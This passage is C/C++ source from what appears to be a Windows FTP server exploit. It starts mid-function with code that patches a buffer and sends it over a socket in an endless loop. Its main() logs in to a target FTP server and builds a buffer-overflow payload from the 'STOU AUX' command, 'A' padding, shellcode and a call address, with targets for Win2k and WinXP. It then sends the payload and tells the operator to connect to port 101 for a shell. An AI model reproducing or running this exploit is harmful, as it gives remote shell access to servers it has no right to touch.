*)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; closesocket(sock); if(atack) { sock=socket(2,1,0); WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("%s - send failed %d\n",ip,WSAGetLastError()); return 0; } else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} len=recv(sock,(char *)buf1,1000,NULL); bool ft=1; if(ft) { int i=0; while(1) { if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) { printf("\nSend failed.Error:%d\n",WSAGetLastError()); return 0; } else { printf("\r%d",++i); } //Sleep(1000); } } send(sock,(const char *)buf2,len1,0); closesocket(sock); } else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); }
int main(int argc,char *argv[]) { ver(); if ((argc<5)||(argc>6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;} if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;} char *login=argv[2], *passwd=argv[3], data[10], recvbuf2[100], recvbuf[100], rootbuf[100], logbuf[100], logbuf2[100], pdbuf[100], pdbuf2[100]; int ip=htonl(inet_addr(argv[4])), sz, a, sizeA, lgth, port; if (argc==6){port=atoi(argv[5]);} else port=21; char *os; if (atoi(argv[1]) == 1){os="Win2k based system";} if (atoi(argv[1]) == 1){os="Win2k based system";} if (atoi(argv[1]) == 2){os="WinXP based system";} if (atoi(argv[1]) == 2){os="WinXP based system";} SOCKET s; struct fd_set mask; struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;} cout<<"[+] target: "<<os<<endl; server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(port); WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL); timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} default: if(FD_ISSET(s,&mask)) { cout<<"[+] connected, login in process..."<<endl; Sleep(100);recv(s,recvbuf2,100,0); if (!strstr(recvbuf2,"220")){cout<<"[+] this is not an ftp server, quitting..."<<endl;return -1;} strcpy(logbuf,"USER ");strcpy(logbuf2,login);strcpy(pdbuf,"PASS ");strcpy(pdbuf2,passwd);strcpy(rootbuf,"STOU AUX");strcpy(data,"\r\n"); if (send(s,logbuf,strlen(logbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} if (send(s,logbuf2,strlen(logbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} Sleep(1000); if (send(s,pdbuf,strlen(pdbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} if (send(s,pdbuf2,strlen(pdbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} Sleep(1000); if (recv(s,recvbuf,200,0)==SOCKET_ERROR){ cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;} if (strstr(recvbuf,"530")){ cout<<"[+] wrong login or passwd"<<endl;return -1;} cout<<"[+] login success!"<<endl;Sleep(1000);cout<<"[+] sending the exploit string"<<endl; if (atoi(argv[1]) == 1){lgth=500+1;} if (atoi(argv[1]) == 2){lgth=498+1;} sizeA=lgth-sizeof(scode); sz=(sizeA-1)+sizeof(scode)+10; memset(payload,0,sizeof(payload)); strcat(payload,cmd);strcat(payload,"\x41\x41\x41"); strcat(payload,scode); for (a=0;a<sizeA;a++){strcat(payload,"\x41");} strcat(payload,call); strcat(payload,"\r\n"); Sleep(1000); if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;} if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;} Sleep(1000); cout<<"[+] size of payload: "<<sz<<endl; cout<<"[+] payload send, connect the port 101 to get a shell."<<endl; return 0; } } closesocket(s); WSACleanup(); return 0; }